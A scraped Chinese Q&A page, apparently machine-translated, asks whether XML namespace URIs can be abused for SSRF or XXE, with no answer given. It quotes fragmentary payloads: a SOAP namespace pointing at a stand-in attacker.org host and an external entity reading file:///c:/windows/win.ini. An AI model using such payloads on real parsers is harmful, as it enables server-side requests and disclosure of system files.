xmlns引用可以用于ssrf / xxe吗?

编程问答 2022-06-05

问题描述

我知道有关插入外部实体(XXE注入)的信息。但是名称空间呢?有没有已知的攻击?有什么不同?

是否可以在xmlns:部分的HTTP / DNS查找中插入一些敏感信息?

soap env:Envelope xmlns:soapenv =“ http://attacker.org/soap/envelope?

例如, !DOCTYPE updateProfile [!ENTITY%file SYstem“ file:/// c:/windows/win.ini”]

,随后:

解决方法

暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!

如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。

小编邮箱:dio#foxmail.com (将#修改为@)

code-injectionnamespacesnamespacesssrfxml-namespacesxxe

相关问答

Selenium Web驱动程序和Java元素在(x,y)点处不可单击其他元素将获得点击?
Selenium Web驱动程序和Java。元素在(x,y)点处不可单击。其...
Python-如何使用点“” 访问字典成员?
Python-如何使用点“。” 访问字典成员?
Java 字符串是不可变的到底是什么意思?
Java 字符串是不可变的。到底是什么意思?
Java中的“ final”关键字如何工作?我仍然可以修改对象
Java中的“ final”关键字如何工作?(我仍然可以修改对象。...
“loop:”在Java代码中这是什么,为什么要编译?
“loop:”在Java代码中。这是什么,为什么要编译?
java.lang.ClassNotFoundException:sun.jdbc.odbc.JdbcOdbcDriver发生异常为什么?
java.lang.ClassNotFoundException:sun.jdbc.odbc.JdbcOdbc...